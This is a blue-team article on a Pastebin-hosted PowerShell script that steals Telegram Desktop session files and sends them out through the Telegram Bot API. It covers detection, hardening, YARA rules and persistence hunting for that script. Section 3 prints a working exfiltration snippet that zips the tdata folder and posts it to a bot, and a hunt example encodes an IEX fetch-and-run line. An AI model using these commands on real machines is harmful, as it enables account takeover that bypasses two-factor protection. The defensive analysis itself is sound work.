
Introduction:
Session hijacking attacks have evolved beyond credential theft, with adversaries now targeting application-specific session files that bypass multi-factor authentication. A newly discovered PowerShell script hosted on Pastebin, disguised as “Windows Telemetry Update – Fixed version,” demonstrates how attackers extract Telegram Desktop session data and exfiltrate it via Telegram’s own Bot API, turning the messaging platform against its users. This article dissects the attack chain, provides detection and mitigation steps, and offers hands-on commands for blue teams.
Learning Objectives:
- Understand how PowerShell scripts can steal Telegram session files without requiring admin privileges.
- Analyze the use of Pastebin as a staging host for the payload and the Telegram Bot API as a covert exfiltration channel.
- Implement defensive measures including PowerShell logging, session file permissions, and network-based detection.
You Should Know:
1. Unpacking the Pastebin PowerShell Session Stealer
The attack begins with a malicious PowerShell script uploaded to Pastebin under a deceptive name. The script, once executed (often via a dropper or social engineering), performs the following actions without triggering UAC prompts because it operates entirely within the user’s profile.
Step‑by‑step guide to analyze the script:
- Locate the raw Pastebin URL (example format: `https://pastebin.com/raw/xxxxxx`). In this campaign, the attackers used a shortened LinkedIn link, but the raw endpoint can be retrieved via browser dev tools or URL unshorteners.
- Download the script in an isolated sandbox (Windows Sandbox or any Linux VM with curl or wget). Fetch it for inspection only; do not execute it:
Windows (PowerShell): Invoke-WebRequest -Uri "https://pastebin.com/raw/EXAMPLE" -OutFile "telemetry.ps1"
Linux: wget https://pastebin.com/raw/EXAMPLE -O telemetry.ps1
- Inspect the script content. Key indicators to look for:
- References to `$env:APPDATA\Telegram Desktop\tdata` – the folder holding the local session store (the `D877F783D5D3EF8C` subfolder with its `map` files and the key files beside it).
- Use of the Telegram Bot API (`https://api.telegram.org/bot<token>/...`) – a hardcoded bot token and chat ID used for exfiltration.
- Invocation of `Invoke-RestMethod` or `WebClient.UploadFile` to send the stolen data.
What this does: The script reads binary session files that keep users logged into Telegram Desktop. By copying these files and posting them to a Telegram bot, the attacker can impersonate the victim on any device without needing a password or two‑factor code.
2. Detecting the Attack on Windows Systems
Defenders must monitor for suspicious PowerShell execution, especially scripts downloaded from Pastebin or invoking Telegram-related API endpoints.
Step‑by‑step detection commands:
- Enable PowerShell script block logging (via Group Policy or registry). The policy key does not exist by default, so create it before setting the value:
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Force | Out-Null
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1 -Type DWord
- Search logged script blocks (Event ID 4104) that reference the Telegram folder. `-match` takes a regular expression, so the backslash must be doubled; `"Telegram Desktop\tdata"` would search for a literal tab character and never match:
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} | Where-Object {$_.Message -match 'Telegram Desktop\\tdata'}
- List processes that currently hold handles inside the Telegram session folder (Sysinternals Handle; use Process Monitor for a recorded timeline rather than a snapshot):
handle64.exe -a tdata
- Monitor outbound connections to `api.telegram.org` (Telegram Bot API) from non-browser, non-Telegram processes. Combine the address and port tests with -and; an -or on port 443 would list every HTTPS connection on the host:
Get-NetTCPConnection | Where-Object {$_.RemoteAddress -like "149.154.167.*" -and $_.RemotePort -eq 443} | Select-Object -Property LocalAddress, LocalPort, RemoteAddress, RemotePort, OwningProcess
Then map the process ID to a process name using Get-Process -Id <PID>. The 149.154.167.x range is where api.telegram.org normally resolves, but Telegram operates several ranges, so confirm the current address with Resolve-DnsName api.telegram.org before relying on it.
Mitigation: Enable the Defender Attack Surface Reduction rule "Block execution of potentially obfuscated scripts" (GUID BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550), which stops the obfuscated variants these droppers tend to use. There is no ASR rule that blocks scripts from reading user-profile folders; Controlled Folder Access (Section 4) is the closest control, and it only blocks writes. Use Add-MpPreference rather than Set-MpPreference so that rules already configured are kept: Add-MpPreference -AttackSurfaceReductionRules_Ids BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 -AttackSurfaceReductionRules_Actions Enabled.
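The indicator list from Section 1 and the 4104 hunt from Section 2 are the same check applied to two sources, a downloaded file and logged script-block text. The function below is an added example, not code from the original post or from the analysed script: it scores a piece of PowerShell text against those indicators, pulls out the bot token and chat ID, and is exercised here on two constructed samples (a stealer look-alike and a benign admin script, neither of which is the real Pastebin payload). The token format (`<bot id>:<34–36-character secret>`) and the sample texts are assumptions.

```powershell
# Added example, not part of the original post or the analysed script.
# One indicator check that serves Section 1 (triage of a downloaded .ps1) and
# Section 2 (hunting through Event ID 4104 script-block text).
# Assumptions: the token format (<digits>:<34-36 chars>) and the sample texts below.

function Test-TelegramStealerIndicators {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [string]$Text,
        [string]$Source = '<inline>'
    )
    process {
        # Indicators named in the article. -match takes a regex, so the path
        # backslash is doubled; "Desktop\tdata" would look for a TAB character.
        $hits = [ordered]@{
            TdataPath  = $Text -match 'Telegram Desktop\\tdata|TelegramDesktop[\\/]tdata'
            BotApiHost = $Text -match 'api\.telegram\.org/bot'
            SendDoc    = $Text -match 'sendDocument|sendMessage'
            HttpCall   = $Text -match 'Invoke-RestMethod|Invoke-WebRequest|UploadFile|HttpClient'
        }

        # Bot tokens are "<bot id>:<secret>" (the id is preceded by "bot" in URLs, so no
        # leading word boundary); chat IDs are large, possibly negative, integers.
        $token  = [regex]::Match($Text, '\d{5,10}:[A-Za-z0-9_-]{34,36}').Value
        $chatId = [regex]::Match($Text, '(?i)chat_?id\W{1,5}(-?\d{6,})').Groups[1].Value

        $score = @($hits.Values | Where-Object { $_ }).Count
        if ($hits.TdataPath -and ($hits.BotApiHost -or $token)) { $verdict = 'MALICIOUS' }
        elseif ($score -ge 2)                                    { $verdict = 'SUSPICIOUS' }
        else                                                     { $verdict = 'CLEAN' }

        [pscustomobject]@{
            Source     = $Source
            Verdict    = $verdict
            Indicators = (@($hits.GetEnumerator() | Where-Object { $_.Value } | ForEach-Object { $_.Key })) -join ','
            BotToken   = $token
            ChatId     = $chatId
        }
    }
}

# Constructed sample that mirrors the stealer's key lines (not the real Pastebin script).
$sampleStealer = @'
$src = "$env:APPDATA\Telegram Desktop\tdata"
Compress-Archive -Path $src -DestinationPath "$env:TEMP\t.zip" -Force
$uri = "https://api.telegram.org/bot1234567890:AAFkEXAMPLEtoken0000000000000000000/sendDocument"
Invoke-RestMethod -Uri $uri -Method Post -Form @{ chat_id = "987654321"; document = Get-Item "$env:TEMP\t.zip" }
'@

# Constructed benign sample: an admin script calling an internal API.
$sampleBenign = @'
$r = Invoke-RestMethod -Uri "https://inventory.corp.example/api/hosts" -Headers $hdr
$r | Export-Csv "$env:TEMP\hosts.csv" -NoTypeInformation
'@

$sampleStealer, $sampleBenign | Test-TelegramStealerIndicators | Format-Table -AutoSize

# Live hunt (Section 2): run the same check over logged script blocks.
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#     ForEach-Object { Test-TelegramStealerIndicators -Text $_.Message -Source $_.TimeCreated } |
#     Where-Object { $_.Verdict -ne 'CLEAN' }
```

The verdict deliberately keys on the combination (a session-store path together with a Bot API host or token) rather than on any single string: `Invoke-RestMethod` alone is everyday administration, and `tdata` alone appears in backup scripts. An extracted token is an indicator worth sharing, since every infected host in a campaign posts to the same bot.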
3. Understanding Telegram Session File Structure and Exfiltration
Telegram Desktop keeps its local session store in %APPDATA%\Telegram Desktop\tdata. Everything needed to resume the session lives there: the `D877F783D5D3EF8C` subfolder (the name is the same on every installation, which is why stealers hardcode it; it is not derived from the user's dc_id) with its `map` files, and the key files beside it, such as `key_datas`, that hold the encrypted authorization keys. The PowerShell script copies these files, compresses them (often into a ZIP), and sends them via a multipart POST request to the Telegram Bot API. Because the authorization key identifies the account rather than the device, the copied folder works as-is when dropped into a Telegram Desktop installation on the attacker's machine.
Step‑by‑step to locate and protect these files:
- On Windows, navigate to the folder:
cd "%APPDATA%\Telegram Desktop\tdata"
dir
- On Linux (Telegram Desktop from a native package; the Snap build keeps its data under ~/snap/telegram-desktop/ instead):
cd ~/.local/share/TelegramDesktop/tdata
ls -la
- Restricting the folder with ACLs has a hard limit: the stealer runs under the same user account as Telegram, and NTFS cannot tell one process of that user from another. A deny entry for Everyone therefore locks out Telegram itself along with the script:
Windows (PowerShell as Admin)
$tdata = "$env:APPDATA\Telegram Desktop\tdata"
icacls $tdata /deny "Everyone:(R,W,D)"
Caution: with this ACL Telegram Desktop can no longer read its own session store and will prompt for a fresh login; it also breaks updates and multi-device sync. Without the (OI)(CI) inheritance flags the deny applies to the folder object only, and files inside remain readable by full path. Treat the command as a lab experiment, not a control: real protection comes from keeping untrusted scripts from running (Section 4) and from detecting the read-then-upload pattern.
Exfiltration simulation: A typical PowerShell snippet used by attackers, archiving the store and posting it as a document (`-Form` exists only in PowerShell 7+; scripts aimed at Windows PowerShell 5.1 build the multipart body by hand or call `WebClient.UploadFile`):
$botToken = "123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11"
$chatId = "987654321"
$uri = "https://api.telegram.org/bot$botToken/sendDocument"
$zip = "$env:TEMP\tdata.zip"
Compress-Archive -Path "$env:APPDATA\Telegram Desktop\tdata" -DestinationPath $zip -Force
Invoke-RestMethod -Uri $uri -Method Post -Form @{chat_id=$chatId; document=Get-Item $zip}
Defenders should block outbound requests to `api.telegram.org` from endpoints that do not require Telegram connectivity (e.g., corporate servers).
4. Hardening Against Telegram Session Hijacking
Beyond script detection, implement several layers of defense to prevent session theft even if an attacker runs a malicious script.
Step‑by‑step hardening guide:
- AppLocker / WDAC: Restrict PowerShell execution to signed scripts only, and deploy a default rule that blocks scripts from `%USERPROFILE%\Downloads` and `%TEMP%`. Execution policy is a convenience setting rather than a security boundary (it is bypassed with -ExecutionPolicy Bypass or by piping the script text into powershell.exe), but it still raises the bar for unsophisticated droppers:
Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope LocalMachine
- Network segmentation: Use Windows Defender Firewall with Advanced Security to block outbound HTTPS to `api.telegram.org` unless explicitly required. The Bot API shares its address range with Telegram's own data centres (149.154.167.x also serves the messaging client), so an IP-based block cuts off Telegram Desktop on that host as well. Where Telegram is a sanctioned application, scope the rule to powershell.exe and pwsh.exe with -Program, or block the hostname at the web proxy instead. Create an outbound rule:
New-NetFirewallRule -DisplayName "Block Telegram Bot API" -Direction Outbound -RemoteAddress 149.154.167.0/24 -Protocol TCP -RemotePort 443 -Action Block
- Apply Zero Trust principle for session stores: Use Microsoft Defender's Controlled Folder Access to protect %APPDATA%\Telegram Desktop and allow only the Telegram client to modify it. Be clear about what this buys: Controlled Folder Access blocks untrusted writes, deletes and encryption, not reads, so it protects the session store from tampering and wiping but does not stop a script from copying it. Enable the feature, add the folder, then allow the client binary (the default per-user install is %APPDATA%\Telegram Desktop\Telegram.exe; the Microsoft Store build lives under a versioned folder in C:\Program Files\WindowsApps):
Set-MpPreference -EnableControlledFolderAccess Enabled
Add-MpPreference -ControlledFolderAccessProtectedFolders "$env:APPDATA\Telegram Desktop"
Add-MpPreference -ControlledFolderAccessAllowedApplications "$env:APPDATA\Telegram Desktop\Telegram.exe"
- Log and alert on PowerShell web requests: Enable PowerShell transcription and forward logs to a SIEM. Search for `Invoke-RestMethod` or `UploadFile` combined with `api.telegram.org`.
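The hardening steps above are written as separate one-liners; in practice they are deployed together, and a few details matter when they are: the firewall rule should hit PowerShell hosts rather than Telegram, `$env:APPDATA` points at the administrator's own profile when the script runs elevated, and the ASR rule is best staged in audit mode first. The script below is an added example, not from the original post, that wires the Section 4 layers together for an elevated PowerShell session on a host where Defender is the active antivirus. The PowerShell host paths, the per-user Telegram install path, the transcript directory and the fallback address range (the one the article cites) are assumptions.

```powershell
# Added example, not part of the original post. Layers from Section 4 wired together:
# a program-scoped egress block, the ASR rule from Section 2, Controlled Folder Access
# and PowerShell transcription. Run in an elevated PowerShell on a Defender-managed host.
# Assumptions: the PowerShell host paths, the per-user Telegram install path, the
# transcript directory, and the fallback address range (the one cited in the article).

# 1. Egress: block PowerShell hosts, not Telegram itself, from reaching the Bot API.
#    Resolve the name now; addresses change, so re-run on a schedule or block the hostname at a proxy.
$apiAddrs = @(foreach ($type in 'A', 'AAAA') {
    Resolve-DnsName -Name 'api.telegram.org' -Type $type -ErrorAction SilentlyContinue |
        Where-Object { $_.IPAddress } | ForEach-Object { $_.IPAddress }
})
if ($apiAddrs.Count -eq 0) { $apiAddrs = @('149.154.167.0/24') }

$psHosts = @(
    "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe",
    "$env:SystemRoot\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
    "$env:ProgramFiles\PowerShell\7\pwsh.exe"
) | Where-Object { Test-Path $_ }

foreach ($exe in $psHosts) {
    $ruleName = "Block Telegram Bot API - $exe"
    if (-not (Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue)) {
        New-NetFirewallRule -DisplayName $ruleName -Direction Outbound -Action Block `
            -Program $exe -Protocol TCP -RemotePort 443 -RemoteAddress $apiAddrs | Out-Null
    }
}

# 2. ASR: "Block execution of potentially obfuscated scripts". Start in AuditMode, review
#    Defender/Operational events 1122 (audited), then switch to Enabled (1121 = blocked).
Add-MpPreference -AttackSurfaceReductionRules_Ids 'BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550' `
                 -AttackSurfaceReductionRules_Actions AuditMode

# 3. Controlled Folder Access for every user's Telegram store on this machine.
#    Limit: CFA blocks untrusted writes/deletes, not reads, so it stops tampering and wiping,
#    not copying. When elevated, $env:APPDATA is the admin's profile, hence the enumeration.
Set-MpPreference -EnableControlledFolderAccess Enabled
$stores = Get-ChildItem -Path "$env:SystemDrive\Users" -Directory |
    ForEach-Object { Join-Path $_.FullName 'AppData\Roaming\Telegram Desktop' } |
    Where-Object { Test-Path $_ }
foreach ($store in $stores) {
    Add-MpPreference -ControlledFolderAccessProtectedFolders $store
    $client = Join-Path $store 'Telegram.exe'   # default per-user install; Store builds live under WindowsApps
    if (Test-Path $client) { Add-MpPreference -ControlledFolderAccessAllowedApplications $client }
}

# 4. Transcription: every PowerShell session writes a transcript the SIEM can collect.
$tx = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription'
New-Item -Path $tx -Force | Out-Null
Set-ItemProperty -Path $tx -Name EnableTranscripting    -Value 1 -Type DWord
Set-ItemProperty -Path $tx -Name EnableInvocationHeader -Value 1 -Type DWord
Set-ItemProperty -Path $tx -Name OutputDirectory        -Value "$env:SystemDrive\PSTranscripts" -Type String
```

The transcript directory should be write-only for users (they must be able to append but not read or delete others' transcripts); set its ACL accordingly or point it at a network share the SIEM collector owns.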
5. Incident Response: What to Do After Session Theft
If you suspect a Telegram session has been compromised, immediate action is required to revoke the attacker’s access and scan for persistence.
Step‑by‑step response procedures:
- Terminate all active Telegram sessions: Open Telegram Desktop → Settings → Devices → “Terminate all other sessions”. Alternatively, use the mobile app: Settings → Privacy and Security → Active Sessions → Terminate All.
- Enable or change the account's Two-Step Verification password (Settings → Privacy and Security → Two-Step Verification), even if it was not enabled before. It does not invalidate the stolen session (terminating sessions does that), but it means a future login needs the password as well as the SMS code. The bot token belongs to the attacker, not to you, so you cannot revoke it through BotFather (`/revoke` only works for bots you own); report the bot account to Telegram (for example via abuse@telegram.org) and hand the token to your SOC as an indicator, since every infected host in the campaign posts to the same bot.
- Scan for the malicious PowerShell script using YARA rules. In YARA text strings `\t` is a tab escape, so the backslash in the path must be doubled; `ascii wide` also catches scripts saved as UTF-16. Example rule:
rule TelegramSessionStealer {
    strings:
        $bot_token = /[0-9]{5,10}:[A-Za-z0-9_-]{35}/ ascii wide
        $tdata = "Telegram Desktop\\tdata" ascii wide nocase
        $sendDoc = "sendDocument" ascii wide nocase
    condition:
        all of them
}
- Check for scheduled tasks or startup entries that re-download the Pastebin script. `Actions` is a collection of action objects, so compare its `Execute` property rather than the collection itself:
Get-ScheduledTask | Where-Object { $_.Actions.Execute -match 'powershell|pwsh' }
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
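A plain string search over task actions and Run keys misses the common case where the dropper hides the Pastebin URL behind `-EncodedCommand`. The hunt below is an added example, not from the original post; it goes one step beyond the article by decoding encoded command lines before matching, checks both scheduled tasks and the HKCU/HKLM Run and RunOnce keys, and first exercises itself on a constructed command line (not a real artifact) so the decoding path can be seen working offline. The IOC pattern is an assumption.

```powershell
# Added example, not part of the original post. Persistence hunt for Section 5: scheduled
# tasks and Run/RunOnce keys whose command lines launch PowerShell with the campaign's
# indicators. Goes one step beyond the article by decoding -EncodedCommand payloads,
# which droppers use to hide URLs from a plain text search. The IOC pattern is an assumption.

$iocPattern = '(?i)pastebin\.com|api\.telegram\.org|Telegram Desktop\\tdata'

function Expand-EncodedCommand {
    # Returns the decoded script if the command line carries -EncodedCommand / -enc / -e <base64>.
    param([string]$CommandLine)
    $m = [regex]::Match($CommandLine, '(?i)\s-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})')
    if (-not $m.Success) { return $null }
    try { [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[1].Value)) }
    catch { $null }
}

function Test-SuspiciousCommandLine {
    param([string]$CommandLine)
    $decoded = Expand-EncodedCommand $CommandLine
    $text    = if ($decoded) { "$CommandLine`n$decoded" } else { $CommandLine }
    $isPs    = $text -match '(?i)powershell|pwsh'
    [pscustomobject]@{
        Suspicious  = [bool]($isPs -and ($text -match $iocPattern -or $decoded))
        CommandLine = $CommandLine
        Decoded     = $decoded
    }
}

# Constructed self-check (not a real artifact): a hidden, encoded Pastebin fetch.
$payload = 'IEX (New-Object Net.WebClient).DownloadString("https://pastebin.com/raw/EXAMPLE")'
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
Test-SuspiciousCommandLine "powershell.exe -w hidden -enc $encoded" | Format-List

# Scheduled tasks: inspect every action's executable and arguments.
$taskHits = foreach ($task in Get-ScheduledTask) {
    foreach ($action in $task.Actions) {
        $result = Test-SuspiciousCommandLine "$($action.Execute) $($action.Arguments)"
        if ($result.Suspicious) {
            [pscustomobject]@{ Source = "Task $($task.TaskPath)$($task.TaskName)"; Command = $result.CommandLine; Decoded = $result.Decoded }
        }
    }
}

# Run/RunOnce keys for the current user and the machine.
$runKeys = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
           'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
$runHits = foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $entries = (Get-ItemProperty -Path $key).PSObject.Properties |
        Where-Object { $_.Name -notmatch '^PS(Path|ParentPath|ChildName|Drive|Provider)$' }
    foreach ($entry in $entries) {
        $result = Test-SuspiciousCommandLine ([string]$entry.Value)
        if ($result.Suspicious) {
            [pscustomobject]@{ Source = "$key\$($entry.Name)"; Command = $result.CommandLine; Decoded = $result.Decoded }
        }
    }
}

@($taskHits) + @($runHits) | Format-List
```

Any encoded PowerShell in a persistence location is flagged even without a known indicator, because a legitimate scheduled task has no reason to hide its command line; review those hits by reading the `Decoded` field rather than dismissing them for lacking a Pastebin string.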
6. Proactive Blue Team Exercises: Emulating the Attack
To test your defenses, emulate the Pastebin-based session stealer in a controlled lab environment. This helps validate detection rules and response playbooks.
Step‑by‑step emulation using safe test credentials:
- Create a disposable Telegram account and a test bot via BotFather. Obtain a bot token.
- Write a minimal PowerShell script (save as test_stealer.ps1) that sends only a dummy file (e.g., a text file) instead of real session data (`-Form` needs PowerShell 7+):
$dummyFile = "$env:TEMP\dummy.txt"
"Test session" | Out-File $dummyFile
$botToken = "YOUR_TEST_BOT_TOKEN"
$chatId = "YOUR_TEST_CHAT_ID"
$uri = "https://api.telegram.org/bot$botToken/sendDocument"
Invoke-RestMethod -Uri $uri -Method Post -Form @{chat_id=$chatId; document=Get-Item $dummyFile}
- Execute the script on a Windows test VM where PowerShell logging is enabled. Verify that your SIEM captures:
- Script block log (Event ID 4104) containing the bot token.
- Network connection to `api.telegram.org` (Security event 5156, Filtering Platform Connection). This audit subcategory is off by default and must be enabled via auditpol or the Advanced Audit Policy before the event will appear.
- Run the detection commands from Section 2 to ensure they correctly identify the activity.
What Undercode Say:
- Session tokens are the new gold: Attackers bypass MFA by stealing local session files. This Pastebin campaign highlights a low‑skill, high‑impact technique that every blue team must address.
- Pastebin remains a popular malware distribution channel despite its age. Organizations should block `pastebin.com` in proxy filters or at the DNS level unless required for legitimate research.
The use of Telegram’s own Bot API for exfiltration is clever because it blends with normal Telegram traffic, evading many egress filters. Defenders must move beyond signature‑based detection to behavioral analytics—watching for scripts that read browser or messaging app data folders and then initiate web requests. Regular rotation of session tokens (though not natively supported by Telegram) can be enforced by forcing users to log out periodically and educating them on the risks of “remember me” features on shared workstations.
Prediction:
As session hijacking tools become commoditized, we will see a surge in Pastebin‑like platforms (e.g., GitHub Gists, GitLab snippets) being used for modular, cloud‑hosted attack scripts. Telegram’s Bot API may face increased abuse, prompting the platform to introduce rate limiting or requiring bot tokens to be bound to specific IP addresses. Organizations will accelerate adoption of EDR solutions that can roll back session file modifications and implement “credential guard” for non‑Windows applications. Within six months, expect proof‑of‑concept tools that automate session extraction from multiple messaging apps (Signal, Slack, Discord) using identical techniques.
Reported By: Mayura Kathiresh – Hackers Feeds


